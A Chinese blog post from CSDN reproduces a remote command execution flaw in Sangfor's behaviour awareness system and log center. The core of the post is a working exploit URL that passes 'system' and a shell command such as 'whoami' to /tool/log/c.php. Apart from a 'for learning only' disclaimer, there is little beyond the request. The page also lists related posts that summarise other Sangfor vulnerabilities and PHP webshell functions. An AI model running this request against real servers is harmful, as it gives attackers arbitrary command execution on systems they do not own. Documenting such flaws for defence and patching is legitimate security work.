深信服行为感知系统&&日志中心 远程命令执行漏洞

最新推荐文章于 2024-07-17 00:00:00 发布
最新推荐文章于 2024-07-17 00:00:00 发布
阅读量2.8k 收藏 2
点赞数 1
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/user_hs/article/details/117676049
版权
本文揭示了深信服行为感知系统和日志中心存在的远程命令执行漏洞,详细描述了漏洞利用过程,包括通过/tool/log/c.php?strip_slashes=system参数触发命令执行。提醒用户勿用于非法测试,以免造成不良后果。影响范围明确,提供了漏洞复现步骤。
摘要由CSDN通过智能技术生成

声明

1、该公众号发布文章仅供学习使用。
2、请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

漏洞描述

深信服行为感知系统&&日志中心 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行

影响范围

深信服 行为感知系统和日志中心

漏洞复现

漏洞地址:

/tool/log/c.php?strip_slashes=system&host=

首页:
在这里插入图片描述在这里插入图片描述
执行:

https://ip/tool/log/c.php?strip_slashes=system&host=whoami

在这里插入图片描述

ximi-(西米)
关注
专栏目录
深信服SG上网优化管理系统存在任意文件读取漏洞 附POC
nnn2188185的博客
10-04 455
深信服SG上网优化管理系统 catjs.php接口存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件。
【1day】复现深信服应用交付管理系统 login 远程命令执行漏洞和账号密码泄漏漏洞
记录并分享学习安全的知识点..
08-16 801
深信服 应用交付管理系统 文件sys_user.conf可在未授权的情况下直接访问,导致账号密码泄漏;深信服 应用交付管理系统 login 存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,执行任意命令
漏洞复现】深信服 行为感知系统 日志中心 c.php 远程命令执行
最新发布
凝聚力安全团队
07-17 325
深信服 行为感知系统 日志中心 c.php存在任意命令执行漏洞,攻击者通过漏洞可以执行服务器任意命令控制服务器权限
深信服 行为感知系统 c.php 远程命令执行漏洞
weixin_46801402的博客
11-09 984
深信服 行为感知系统 c.php 远程命令执行漏洞
深信服行为感知命令执行漏洞
剁椒鱼头没剁椒的博客
01-18 4817
深信服 行为感知系统c.php远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行。其实整个过程和深信服EDR命令执行漏洞差不多。其实整个URL和EDR差不多。
深信服EDR漏洞复现
黑白的博客
11-06 1776
声明 往后,复现的每个漏洞,我都会分享出来,希望可以通过这种方式,提高自己的能力,也希望大家可以一起学习,共同进步 漏洞描述 据说是有人把源码放网上了,不过看了看源码审计的骨偶成,也确实利用php反序列化,从而RCE 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC
2024HVV在即| 最新漏洞CVE库(1.5W)与历史漏洞POC总结分享!
记录开发和安全学习过程中的点点滴滴
04-22 1840
也快到护网的时间了,每年的护网都是一场攻防实战的盛宴,那么漏洞库就是攻防红蓝双方人员的弹药库,红队人员可以通过工具进行监测是否存在历史漏洞方便快速打点,而蓝队则可以对资产进行梳理和监测历史漏洞,及时处理和修复,做好准备.
深信服SCSA安全工程师题库(方便大家复习备考)
热门推荐
a5a8a45的博客
04-11 1万+
1、【EDR】下列哪个端口是紧急情况下EDR管理平台和客户端通信端口,即紧急情况下用于下发Agent重启、Agent卸载和Agent停止等指令。( ) A:443.0 B:54120.0 C:8083.0 D:8088.0 正确答案B 2、【EDR】客户有7000个终端需要安装EDR客户端进行安全防护, 请问推荐部署多少个EDR管理平台( ) A:1个 B:2个 C:4个 D:6个 正确答案C 3、【EDR】EDR的Agent客户端不支持在以下哪种类型的终端上安装( ) A:Windows Server B
[网络安全提高篇] 一一三.Powershell恶意代码检测 (1)论文总结及抽象语法树(AST)提取
杨秀璋的专栏
03-11 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。这篇文章将详细讲解PowerShell、Powershell恶意代码检测总结及抽象语法树(AST)提取。希望这篇文章对您有帮助,也推荐大家去阅读论文,且看且珍惜。
6-1 安全产品&防火墙(完)
weixin_45923850的博客
08-20 2886
文章目录分类按安全事件发生顺序按安全的功能等级保护扫描器安全基线核查(BVS)概念核查内容常见产品防火墙概念防火墙 & 路由器特征分类防火墙组网方式安全区域安全区域配置安全策略NAT——地址转换攻击防范应用行为控制常见产品入侵防护系统(IDS & IPS)web应用防火墙(WAF)软WAF硬WAF防篡改产品抗拒绝服务攻击上网行为管理VPN数据库审计堡垒机网闸态势感知网闸态势感知 分类 按安全事件发生顺序 事前预防:在安全事件发生之前,发现信息系统本身存在安全隐患,修复、避免等方式进行加固,
网络安全等级保护测评核心产品供应厂商推荐目录。
09-27 4290
符合信息安全等级保护二级以上标准(非涉密信息系统)网络安全产品与服务推荐目录 序号 类别 子类 产品型号 安全厂商 1 边界隔离类 安全隔离与信息交换(网闸) 天清安全隔离与信息交互系统V2.6/GAP-6000网闸(三级) 北京启明星辰信息安全技术有限公司 2 天融信安全隔离与信息交换系统TopRules V3 ...
AC上网行为管理之行为感知系统部署
weixin_53946822的博客
11-21 162
1、目前支持 Windows Server 2008 及之后的服务器操作系统, 并且系统要求是 64 位操作。2、在AC/SG设备中【系统管理】-【系统配置】-【日志中心配置】配置外置日志中心同步策略。1、在行为感知系统系统配置】-【同步策略】建立同步策略与上网行为管理设备对接同步。1、内外置BA都支持【日志导出】功能,将审计的日志根据需要自定义导出。2、安装行为感知的服务器建议使用双核的CPU,内存2G以上。3、AC设备与外置数据中心通讯端口能正常通信。3、勾选导出内容和导出方式,即可将日志完成导出。
深信服edr终端漏洞
qq_40806924的博客
08-20 4442
一、前言 最近这些天来了广州当蓝方,工作之余听到了几个朋友说关于深信服edr爆0day的情况,自己也没时间复现,就简单记录一下。 该XXX简介: 深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。在应对高级威胁的同时,通过云网端联动协同、威胁情报共享、多层级响应机制,帮助用户快速处置终端安全问题,构建轻量级、智能化、响应快的下一代终端安全系统。 ** 二、影响范围 fofa上大概有37页
【HW2020漏洞回顾】深信服EDR两大漏洞
wuguojie888的博客
08-20 9116
深信服终端检测响应平台EDR,围绕终端资产安全生命周期,通过预防、防御、检测、响应赋予终端更为细致的隔离策略、更为精准的查杀能力、更为持续的检测能力、更为快速的处置能力。支持统一化的终端资产管理、终端病毒查杀、终端合规性检查和访问控制策略管理,支持对安全事件的一键隔离处置,以及对热点事件IOC的全网威胁定位。绝大多数的EDR管理平台部署于内网环境中,少数系统可以通过外网地址访问。 NO.1 后台任意用户登陆漏洞 【详情】攻击者可以通过构造payload绕过登录判断,直接拿到系统管理员/用户权..
深信服数据中心管理系统 XXE漏洞复现
0xSec
08-16 2403
深信服数据中心管理系统DC存在XML外部实体注入漏洞。由于后端对传入的XML对象进行了非预期内解析,攻击者可以利用该漏洞进行XML注入攻击,获取系统敏感信息。
PHP危险函数及漏洞复现
Feng_Blue_的博客
09-29 795
危险函数 eval 语句: eval 会将符合php语法规范字符串当作php代码执行,能够实现简单的一句话木马,列如: 但这里我们用Feng来进行中国菜刀连接。 连接成功之后如下 能直接对对方服务器进行任何控制, assert() assert()同样会将字符串当做PHP 代码来执行。 在网页中通过hackbar来操作,是可以执行系统命令,如下图 preg_replace() 这个函数的作用是对字符串进行正则匹配后替换,列如下图: preg_rep...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值